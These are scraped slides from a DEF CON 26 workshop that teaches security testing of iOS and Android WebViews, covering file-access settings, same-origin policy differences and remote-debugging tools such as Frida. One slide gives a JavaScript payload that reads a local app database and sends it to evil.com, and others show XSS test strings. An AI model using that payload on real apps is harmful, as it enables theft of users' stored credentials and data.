where’s my browser? - def con con 26/def con 26 workshops...– xcode – android studio + chrome...
TRANSCRIPT
![Page 1: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/1.jpg)
![Page 2: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/2.jpg)
2
Where’s My Browser? Learn Hacking iOS and Android WebViews David Turco (@endle__)
Jon Overgaard Christiansen
Workshop
DEF CON 26
9 Aug 2018
![Page 3: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/3.jpg)
3 9 Aug 2018
Who Are We?
David Turco (@endle__) Senior Security Consultant
Context Information Security
Jon Overgaard Christiansen Principal Consultant
Context Information Security
![Page 4: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/4.jpg)
4 9 Aug 2018
Context Information Security
• Leading cyber security consultancy
– Assurance
– Research
– Response
– Advisory
• Offices:
– United Kingdom
– Germany
– Australia
– United States
![Page 5: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/5.jpg)
5 9 Aug 2018
Who You Are
• Basic Web App Security – <script>alert(1)</script>
– Web Developer Tools?
• Basic Mobile App Security – APK or IPA?
– ADB
• Basic JavaScript/programming – XMLHttpRequest?
– function lie(b) {return !b}
![Page 6: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/6.jpg)
6 9 Aug 2018
What You Have
• Best: – Laptop with Mac OS X – Xcode – Android Studio + Chrome
• Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox or VMWare – A physical iOS Device
• Bad (but don't despair): – No Mac OS X and no iOS Device
![Page 7: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/7.jpg)
7 9 Aug 2018
You Will
• Improve your Web and Mobile testing knowledge
• Learn Tools and Techniques for testing WebViews
• Practice Exploitation Techniques
• Become a better Web and Mobile App tester
![Page 8: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/8.jpg)
8
Agenda
• Introduction to WebViews • Where's My Browser? Mobile apps • Attack surface • Attacking WebViews - exfiltration of data • Testing toolkit and techniques • Practical 1
– Testing environment setup – Data Exfiltration
• Attacking WebViews - JavaScript-Native bridges • Practical 2
– JavaScript-Native bridges • Mitigations
9 Aug 2018
![Page 9: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/9.jpg)
9 9 Aug 2018
What are WebViews?
… in the beginning
![Page 10: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/10.jpg)
10 9 Aug 2018
What are WebViews?
![Page 11: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/11.jpg)
11 9 Aug 2018
What are WebViews?
Web 2.0
![Page 12: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/12.jpg)
12 9 Aug 2018
© Motorola
![Page 13: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/13.jpg)
13 9 Aug 2018
© Apple
![Page 14: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/14.jpg)
14 9 Aug 2018
![Page 15: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/15.jpg)
15 9 Aug 2018
What are WebViews?
Web 2.0
![Page 16: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/16.jpg)
16 9 Aug 2018
![Page 17: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/17.jpg)
17 9 Aug 2018
![Page 18: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/18.jpg)
18
What are WebViews?
• Browsers embedded in mobile apps: • Components part of UI Toolkit
• Display Web Pages
• Hybrid Apps • Web technologies + Native mobile technologies
9 Aug 2018
![Page 19: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/19.jpg)
19 9 Aug 2018
Where's My Browser?
It’s in your apps!
![Page 20: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/20.jpg)
20 9 Aug 2018
WebViews vs Mobile Browsers
• No information is shared between WebViews and the Mobile Browser!
• Developers now control the Browser ¯ \_(ツ)_/¯
![Page 21: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/21.jpg)
21 9 Aug 2018
Why Using WebViews? - PROS
• Reuse of existing web code in
mobile apps
• Portability
• Developers familiar with web technologies
• Rapid patching of apps
![Page 22: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/22.jpg)
22 9 Aug 2018
Why Using WebViews? - CONS
• Look and feel
• Performance
• Challenges: – Offline usage
– Integration with mobile capabilities
![Page 23: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/23.jpg)
23
We Will Cover
• Bare functionality of: – Android WebView
– iOS UIWebView (Deprecated)
– iOS WKWebView (iOS 8+)
9 Aug 2018
![Page 24: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/24.jpg)
24
We Will NOT Cover
• WebView-based frameworks: – Apache Cordova
– Adobe PhoneGap
– …
• Desktop-based frameworks: – Electron
– NW.js
– …
9 Aug 2018
![Page 25: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/25.jpg)
25
Where's My Browser? Android
Where's My Browser? iOS
Where’s My Browser? - Mobile Apps
9 Aug 2018
![Page 26: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/26.jpg)
26
Where’s My Browser? - Mobile Apps
• Android and iOS vulnerable applications to learn hacking WebViews
• Fully configurable WebViews: – Use preconfigured vulnerable scenarios and tasks
– Explore WebViews on your own
• Open source (GPLv3.0)
• https://authenticationfailure.com/wmb
9 Aug 2018
![Page 27: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/27.jpg)
27
Where’s My Browser? – Android App
9 Aug 2018
![Page 28: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/28.jpg)
28
Where’s My Browser? – iOS App
9 Aug 2018
![Page 29: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/29.jpg)
29
Attacking WebViews
Run untrusted JavaScript inside the WebView
9 Aug 2018 Image from icon8.com
![Page 30: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/30.jpg)
30
Injecting into WebViews
• Cross-Site Scripting (XSS)
• MiTM: – Clear-text protocols
– SSL Stripping
<img src='x' onerror=alert('XSS')/>
9 Aug 2018
![Page 31: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/31.jpg)
31 9 Aug 2018
Injecting into WebViews
• Mobile specific: – More MiTM (e.g. misconfigured/disabled SSL certificate validation)
– Loading external pages in the WebView:
– URL schemes/Intents:
– Overwrite App files on shared storage
– …
<a href="http://ev.il">Click Me!</a>
myapp:// https://myapp.com/
![Page 32: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/32.jpg)
32
JavaScript Support
Android iOS UIWebView iOS WKWebView
OFF by default. Can be enabled with:
enableJavaScript(true)
Always ON. Cannot be disabled
ON by default. Can be disabled with: webViewPreferences.javaScr
iptEnabled = false
9 Aug 2018
![Page 33: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/33.jpg)
33 9 Aug 2018
JavaScript Test Payload
• WKWebViews don't display alert boxes!
• Bad payload:
• Better to use something more "visible":
<script>alert(1)</script>
<script>console.log("XSS")</script> <marquee>XSS</marquee> <h1>XSS</h1> [...]
![Page 34: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/34.jpg)
34
Exfiltration of Data
• App’s sandbox (credentials, sensitive info): – Preferences (.xml, .plist) – Local databases (SQLite) – Cache files
• Device – Pictures
9 Aug 2018
![Page 35: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/35.jpg)
35
Loading HTML data into WebViews
• Remote resource via URL
• Local resource on the filesystem
• Directly load data (from String)
http://www.example.com
file:///file/path
<h1>Hello World</h1>
9 Aug 2018
![Page 36: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/36.jpg)
36
Same-Origin Policy
• Origin:
• Same Origin Policy (SOP): – Mechanism that restricts JavaScript running in the context of one
origin to access objects from another origin
9 Aug 2018
![Page 37: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/37.jpg)
37 9 Aug 2018
Same-Origin Policy
• Cross-Origin Resource Sharing (CORS) – Relax the Same-Origin Policy:
• Find out more at: – https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS
Access-Control-Allow-Origin: http://www.example.com Access-Control-Allow-Methods: POST, GET, PUT, PATCH, DELETE Access-Control-Allow-Credentials: true
![Page 38: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/38.jpg)
38 9 Aug 2018
Same-Origin Policy
• How does the Same-Origin policy apply to: – local resource on filesystem
– data loaded directly into WebView
file:///file/path
<h1>Hello World</h1>
![Page 39: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/39.jpg)
39
Access from File - iOS UIWebView
• File access is enabled by default. – Can’t be disabled
• Same-Origin policy disabled from file:// – Files can access all file:// resources
– Files can access resources from other schemes (e.g. https) “with credentials”
9 Aug 2018
![Page 40: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/40.jpg)
40
Access from File - iOS UIWebView
9 Aug 2018 Icons from icon8.com
![Page 41: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/41.jpg)
41
Access from File - iOS UIWebView
9 Aug 2018 Icons from icon8.com
![Page 42: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/42.jpg)
42
Exfiltration Payload
xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4) {
img = new Image();
img.src = "http://www.evil.com/?data="
+ encodeURIComponent(this.responseText)
}
}
xhttp.open("GET", "../path/to/database");
xhttp.send();
9 Aug 2018
![Page 43: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/43.jpg)
43
Access from File - iOS WKWebView
• File access enabled by default
• Access to other files is not allowed – Can be enabled by setting an undocumented property:
• Same-origin and CORS are honoured – Cannot be changed
wkWebViewPreferences.setValue("Yes", forKey: "allowFileAccessFromFileURLs")
9 Aug 2018
![Page 44: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/44.jpg)
44
Access from File - Android
• File access enabled by default – Can be disabled with:
• Access to other files disabled by default since Android 4.1 Jelly Bean – Can be enabled with:
webViewSettings.setAllowFileAccess(false);
webViewSettings.setAllowFileAccessFromFileURLs(true);
9 Aug 2018
![Page 45: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/45.jpg)
45
Access from File - Android
• Access to other URI schemes honours same-origin policy and CORS by default (since Android 4.1 Jelly Bean) – The Universal Access option disables the same-origin policy and
results in credentialed Universal XSS from file:
webViewSettings.setAllowUniversalAccessFromFileURLs(true);
9 Aug 2018
![Page 46: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/46.jpg)
46
Access from File - Comparison
iOS UIWebView iOS WKWebView Android
Access to file Always ON. Can’t disable
Always ON. Can’t disable
ON by default. Can be disabled with: setAllowFileAccess(false)
Access to files from file
Always ON. Can’t disable
OFF by default. Enable via undocumented property: allowFileAccessFromFileURLs
OFF by default since Android 4.1. Can be enabled with: setAllowFileAccessFromFileURLs(true)
Universal access from file. (Same-origin policy disabled)
Always ON. Can’t disable
Always OFF OFF by default since Android 4.1. Can be enabled with: setAllowUniversalAccessFromFileURLs(true)
9 Aug 2018
![Page 47: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/47.jpg)
47
Loading data Programmatically
Load HTML data from String:
Code
Android void loadData(String data, String mimeType, String encoding) void loadDataWithBaseURL(String baseUrl, String data, String mimeType, String encoding, String historyUrl)
iOS UIWebView func loadHTMLString(_ string: String, baseURL: URL?)
iOS WKWebView func loadHTMLString(_string: String, baseURL: URL?) -> WKNavigation?
9 Aug 2018
![Page 48: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/48.jpg)
48
Loading data Programmatically
• iOS UIWebViews: – Allow access to file:// resources – Same-Origin Policy is disabled – CORS headers are not honoured
• Android and iOS WKWebView behave safely
Effective origin when baseURL is NULL
Android null
iOS UIWebView applewebdata://CBCF4B25-625E-4069-87F4-0CEC46ECE6B3
iOS WKWebView null
9 Aug 2018
![Page 49: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/49.jpg)
49 9 Aug 2018
![Page 50: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/50.jpg)
50 9 Aug 2018
Toolkit and Testing Techniques
• Intercepting proxy
• Remote debugging: – Chrome > Android WebViews
• What if remote debugging is disabled?
– Safari > iOS WebViews
– Chrome >>>> iOS WebViews • What if remote debugging is disabled?
![Page 51: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/51.jpg)
51 9 Aug 2018
Web Developer Tools
• Use the browser on PC/Mac to debug WebViews on Android and iOS – Chrome -> Android WebViews
– Safari -> iOS WebViews
![Page 52: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/52.jpg)
52 9 Aug 2018
Remote Debugging Android
• Prerequisites – Enable developer mode and Android Debug Bridge (ADB) (physical
device only)
– Application needs to have WebView debugging enabled:
• Different from the debugging option in the Android manifest!!!
webView.setWebContentsDebuggingEnabled(true);
![Page 53: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/53.jpg)
53 9 Aug 2018
Remote Debugging Android - Chrome
• In Google Chrome visit the URL: – chrome://inspect
![Page 54: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/54.jpg)
54 9 Aug 2018
Remote Debugging Android - Chrome
![Page 55: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/55.jpg)
55 9 Aug 2018
Remote Debugging Android
• What if the application does not have remote debugging enabled? – Instrumentation at runtime:
• Frida
– Patch the application: • SMALI magic, e.g. using apktool
https://ibotpeaches.github.io/Apktool/
– JavaScript-based remote debuggers: • WEINRE (…stay tuned)
![Page 56: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/56.jpg)
56 9 Aug 2018
Frida
• Dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers.
• Cross-platform: – Android/iOS – Linux/MacOS X/Windows
https://www.frida.re/ https://codeshare.frida.re/
![Page 57: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/57.jpg)
57 9 Aug 2018
Remote Debugging Android – Frida (1/2)
Java.perform(function() { Java.choose("android.webkit.WebView", { "onMatch": function(o) { try { var Runnable = Java.use('java.lang.Runnable'); var MyRunnable = Java.registerClass({ name: 'com.example.MyRunnable', implements: [Runnable], methods: { 'run': function() { o.setWebContentsDebuggingEnabled(true); console.log('WebView Debugging should be enabled'); } } }); var runnable = MyRunnable.$new(); o.post(runnable); }
![Page 58: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/58.jpg)
58 9 Aug 2018
Remote Debugging Android – Frida (2/2)
https://gist.github.com/authenticationfailure/97c74d5475707598e6478395bc9bc9d6
catch (e) { console.log("Execution failed " + e.message); } }, "onComplete": function() { console.log("Execution completed") } }) } );
![Page 59: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/59.jpg)
59 9 Aug 2018
Remote Debugging iOS
• Prerequisites: – Enable "Web Inspector" on the device:
• Settings > Safari > Advanced > Web Inspector
– Enable Safari's Developer Options on Mac OS X
– Can be fussy with Safari version vs iOS version.
– Requires that the app is "Built for testing"
![Page 60: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/60.jpg)
60 9 Aug 2018
Remote Debugging iOS - Safari
1. In Safari select Develop > YourName's iPhone
2. Then select the WebView to inspect:
![Page 61: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/61.jpg)
61 9 Aug 2018
Remote Debugging iOS - Safari
![Page 62: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/62.jpg)
62 9 Aug 2018
Remote Debugging via iOS WebKit Adapter
• What if you don’t have a Mac?
• Use "Remotedebug iOS WebKit Adapter": – Remotely debug iDevices from
Linux and Windows using Chrome
– https://github.com/RemoteDebug/remotedebug-ios-webkit-adapter
![Page 63: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/63.jpg)
63 9 Aug 2018
Remote Debugging via iOS WebKit Adapter
• Preinstalled in the Workshop Virtual Machine
• Installation steps documented in: – WMB_Workshop_Remote_Debugging_WebVie
ws_v1.0.pdf
• Can be flaky. Try to: – Refresh the page
– Disconnect and reconnect the developer tools
– Stop and start the adapter
– Disconnect and reconnect the device
